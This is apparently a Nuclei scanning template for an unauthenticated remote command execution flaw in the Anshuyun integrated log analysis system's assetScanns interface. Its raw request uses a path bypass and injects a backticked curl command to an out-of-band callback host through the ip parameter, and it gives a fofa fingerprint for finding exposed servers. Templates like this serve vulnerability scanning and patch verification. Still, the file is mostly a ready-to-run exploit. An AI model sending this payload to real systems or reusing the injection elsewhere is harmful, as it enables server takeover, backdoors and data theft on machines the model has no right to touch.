http:
    - matchers:
        - part: interactsh_protocol
          type: word
          words:
            - dns
      raw:
        - |
          POST /js/..;/assetTopo/assetScanns HTTP/1.1
          Host: {{Hostname}}
          Content-Type: application/x-www-form-urlencoded

          ip=127.0.0.1`curl {{interactsh-url}}`&port=8083
id: anshuyun-assetScanns-RCE
info:
    author: Superhero
    description: |-
        fofa: icon_hash="-2008445303"
        安数云综合日志分析系统 assetScanns 接口存在远程命令执行漏洞，未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。该漏洞利用难度较低，建议受影响的用户尽快修复。
    name: 安数云综合日志分析系统 assetScanns 远程命令执行漏洞
    reference:
        - https://mp.weixin.qq.com/s/d0aFKk31-wovDrFT7-rj4w
    severity: high
    tags: []
